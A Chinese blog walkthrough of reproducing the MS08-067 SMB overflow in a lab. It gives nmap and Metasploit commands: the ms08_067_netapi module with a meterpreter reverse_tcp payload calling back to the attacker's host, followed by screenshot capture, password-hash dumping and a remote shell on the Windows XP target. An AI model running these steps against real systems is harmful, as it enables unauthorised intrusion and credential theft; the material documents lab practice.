MS08-067漏洞重现

(1):MS08-067远程溢出漏洞描述

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。

(2) :查询MS08-067是否存在于目标靶机上:

重现此实验在局域网中实行,目标靶机是:windows  xp,(注:此xp系统是2001年版本的,在msdn上下载的!)攻击机:kali-linux1.0.9;

可以先通过nmap扫描工具去扫描目标主机的端口及目标系统存在的高位漏洞,作为渗透测试的第一步:信息收集!在metasploit中调用nmap插件--script=smb-check-vulns:命令执行如下:

存在漏洞的标志:(ms08-067)

nmap扫描的结果里报告发现MS08-067:DISABLED。 这是在暗示我们或许能够对这台主机进行渗透攻击,然后我们在 Metasloit里面找到此漏洞的攻击模块,并尝试攻击目标机器。MS08-067是一个对操作系统版本依赖非常高的漏洞,所以在这里,我们只自动payload指定一下目标就可以确保触发正确的溢出代码。

(3)搭建环境过程及原理分析:

1>开启xp和kali,并配置ip在同一网段(检查ping通即可);我的因为是内网,所以有ip划分的因素导致看起来不在同一网段,其实就在同一网段的;

Xp:172.25.0.95:  255.255.252.0:   网关:172.25.3.254

Kali:172.25.3.3:   255.255.252.0:   网关:172.25.3.254

2>kali开启metasploit;这个通过选项applications>kali linux>system service>metasploit>metasploit start.(执行结束如下图所示:)(注:第一段是指框架默认首先开启kali集成的postgresql数据库,第二段和第三是开启metasploit框架服务的)

3>进入metasploit的msfconsole控制台:命令msfconsole;(此过程可能得2-5分钟,因为它是在加载一些模块等等)。接着你会看到友好的欢迎页面:

4>在msf>提示符下:输入search  ms08-067;查找与其相关的漏洞攻击程序;(重要信息都在红圈标记中:下面同上,就不一一提示了!)

5>输入使用该漏洞攻击程序:命令:use exploit/windows/smb/ms08_067_netapi;执行结束后如下:

6>如上我们已经驾驭了(ms08_067_netapi)这个漏洞攻击程序,哈哈!接下来我们要找一找metasploit下的有效攻击荷载(payload),那就使用命令:show  payloads来查找一下吧!

本来选择如图中标记的的payload,但是为了结合书上作者第二个:meterpreter(注:这是一个metasploit框架下强大的payload)的演示我改做下面的payload,其实目的是为了显示更多的效果(ps:新手不就是为了多看到点效果么,才能杨样自得!哈哈,扯远了,就是让大家玩玩,真正的黑客可是不玩这些小伎俩的哦 QWQ);执行如下:

7>既然找到了上图的payload,那就不妨尝试一下:使用命令:set payload windows/meterpreter/reverse_tcp; 执行如下:

8>完成渗透攻击模块与攻击载荷模块的选择之后,需要查看配置渗透攻击所需的配置选项,具体命令如下:show options(方块中是空的?我在这里解释一下:RHOST:表示靶机的ip地址,我们还没设置,但是不要着急,随后设置;LHOST:肯定读者会想到这是攻击主机的ip了吧?对,读者很聪明,答案是肯定的,就是攻击主机的ip,另外,别的选项读者也可以自己试着理解一下,我就不在这里一一解释了,相信聪明的你应该可以想到!)

9>now,现在我们需要设置ip咯,设置命令:set RHOST  172.25.0.95

Set LHOST  172.25.3.3;如下所示:

10>设置完成之后我们需要知道目标靶机的系统类型,现在去查询这个payload有多少种可攻击的系统:show targets

哇!!!不错,竟然有67种的系统去攻击,那么我们应该选择哪个目标呢?不要着急,可能你不太明白你的xp到底是属于如上67种的哪一个,但你可以选择一个默认的哦;给你看:

11>你可以选择target 0,因为它是自动帮你匹配的,多省事啊!执行如下命令选择目标:set target 0

12>现在呢,我们基本已设置完成,接下来我们show一下看看自己的配置都在不?确认一下信息:(看到了吧,我们的配置没问题吧!Ip都有了啊!!!)

13>接下来就是见证奇迹的时刻了,哈哈卖个关子!!!,开始攻击:命令:exploit

吼吼!!!成功了!!!已成功拿下对方主机,那么现在你要做什么呢?好的,告诉你一句话:好戏开锣咯···

(4)是时候让你体验一下当黑客的感觉了!Hello,hacker

1>做到这里接下来就希望你能照着书上的去实现了,苦于你没机会展示的机会来了,还等什么呢?好吧,废话少说第一个“破坏”玩起!哈哈;(但是本人更喜欢从最后一个:实例5玩起!!!)

实例5:获得目标系统的屏幕截图:

(可以读懂么,它把截图放在你kali的root路径下了,我拿出来你看看)

实例4:获得系统当前的进程列表:

实例3:获得当前的工作目录和用户id:

实例2:获得目标系统的password hash(密码哈希:ps:这个我们在密码学中会学到的。。。)

实例1:获得目标系统的DOS shell:(PS:这才是黑客所关注的东西,因为有了它,什么木马,后门之类的东西都变得容易起来啦!)让我们一起来看看这个神奇的东西吧!!!

怎么样?简单的一个命令我们就拿到对方的cmd控制台了吧?爽不爽?哈哈。。。为了让你更加大开眼见,我准备了实例0来让你一爽到底···

实例0:那我就和靶机简单比较一下命令:ipconfig/all吧!!!

从靶机拿到的ipconfig/all:(简单解释一下啊kali截图中所有问号问题:那是因为汉字编码问题:可能是UTF-8的缘故吧!!!)

(5)总结:是时候结束演示了,所有的东西总是不会尽善尽美,读者想要看到的木马,后门之类的功能我并没有实现,原因是本人也是渣渣,望理解,不过这也为读者带去兴趣去搞搞了,或许你就可以实现更高级的功能,我也继续努力希望有一天可以呈现给读者是更高级的漏洞攻击!嗯,衷心的希望和读者一起努力,共筑计算机世界的安全!!!

参考文献:

《渗透测试实践指南》   (美)Patrick  Engebretson著;

《网络攻防技术》       武晓飞 著;

《Metasploit渗透测试魔鬼训练营》     诸葛建伟 著;

《kali-linux渗透测试的艺术》      (英)Lee  Allen;

ms08-067漏洞的复现的更多相关文章

  1. Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程

    v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VM ...

  2. phpStudy后门漏洞利用复现

    phpStudy后门漏洞利用复现 一.漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache.PHP.MySQL.phpMyAdmin.ZendOptimiz ...

  3. JBOSS中间件漏洞总汇复现

    JBOSS中间件漏洞总汇复现 JBoss JMXInvokerServlet 反序列化漏洞 漏洞复现 直接使用docker搭建的漏洞环境. 环境搭建完成后,直接使用工具检测即可:工具下载地址https ...

  4. ThinkCMF X1.6.0-X2.2.3框架任意内容包含漏洞分析复现

    ThinkCMF X1.6.0-X2.2.3框架任意内容包含漏洞分析复现 一.ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理系统框架,底层采用ThinkPHP3. ...

  5. 泛微e-cology OA系统远程代码执行漏洞及其复现

    泛微e-cology OA系统远程代码执行漏洞及其复现 2019年9月19日,泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞.攻击者通过调用BeanShell组件中 ...

  6. Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现

    Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现 一.漏洞描述 该漏洞源于程序没有限制可在代理中序列化的类.远程攻击者可借助特制的序列化的java消息服务(JMS)Objec ...

  7. CVE-2019-0708漏洞利用复现

    CVE-2019-0708漏洞利用复现 距离这个漏洞爆出来也有好几个月了,之前一直忙也没来得及写文档,现在重新做一遍. 准备环境: win7靶机 IP地址:172.16.15.118 Kali攻击机 ...

  8. MS17-010漏洞利用复现

    MS17-010漏洞利用复现 准备环境: win7靶机 IP地址:172.16.15.118 Kali攻击机 IP地址:172.16.15.50 首先我们需要查看一下靶机是否开启445端口 打开kal ...

  9. CVE-2020-7245 CTFd v2.0.0 – v2.2.2漏洞分析复现

    CVE-2020-7245 CTFd v2.0.0 – v2.2.2漏洞分析复现 一.漏洞介绍 ​ 在 CTFd v2.0.0 - v2.2.2 的注册过程中,如果知道用户名并在 CTFd 实例上启用 ...

  10. ThinkCMF框架任意内容包含漏洞分析复现(写入shell+文件包哈)

    ThinkCMF框架任意内容包含漏洞分析复现 0x00 简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建.ThinkCMF提出灵活的应用 ...

随机推荐

  1. Freemarker代码生成器原理说明

    一.Freemarker基本原理: FreeMarker是一款模板引擎: 即一种基于模板和要改变的数据, 并用来生成输出文本(HTML网页.电子邮件.配置文件.源代码等)的通用工具. 它不是面向最终用 ...

  2. styled-components真的好吗?

    最近在学习react,然后遇到react中css该怎么写这个问题,上知乎上看了好多大牛都说styled-components好用是大势所趋. 但我自己用了感觉体验却很差,我在这里说说我为啥觉得styl ...

  3. Coursera在线学习---第五节.Logistic Regression

    一.假设函数与决策边界 二.求解代价函数 这样推导后最后发现,逻辑回归参数更新公式跟线性回归参数更新方式一摸一样. 为什么线性回归采用最小二乘法作为求解代价函数,而逻辑回归却用极大似然估计求解? 解答 ...

  4. 【IDEA】IDEA设置新建文件的模板

    今天在IDEA中新建JS文件的时候想着也像WebStorm一样可以显示作者和时间,所以就研究了下在IDEA中修改文件创建时的模板. 点击settings找到File and Code Template ...

  5. inet_addr_onlink

    /* 根据指定设备的ip配置块,判断地址a,b是否在同一子网 */ /* --邻居项要求,在同一子网中的两个设备, 至少有一个接口有相同的子网配置, --也就是说对端的in_dev->ifa_l ...

  6. linux系统分区参考

    UPDATE: update is used to download package information from all configured sources. UPGRADE:  upgrad ...

  7. IE6-IE9不支持table.innerHTML的解决方法--终极解决办法

    一.把要转译的内容放到其他属性中,例如“tt” <p class="feedback_answer_content" tt='${feedInfo.feedback_answ ...

  8. java的loadrunner脚本案例

    /* * LoadRunner Java script. (Build: 670) *  * ״̬£º²¢·¢²âÊÔͨ¹ý * ²âÊÔÈË£ºÕÔС±ò * ÈÕÆÚ£º2013-09-2 ...

  9. C/C++——static修饰符

    1. static变量 static 用来说明静态变量.如果是在函数外面定义的,那么其效果和全局变量类似,但是,static定义的变量只能在当前c程序文件中使用,在另一个c代码里面,即使使用exter ...

  10. .htaccess技巧: URL重写(Rewrite)与重定向(Redirect)

    URL重定向是.htaccess的重头戏,它可以将长地址转为短地址.将动态地址转为静态地址.重定向丢失的页面.防止盗链.实现自动语言转换等.笔者觉得难点是在正则表达式的运用和理解上. 实现所有这些神奇 ...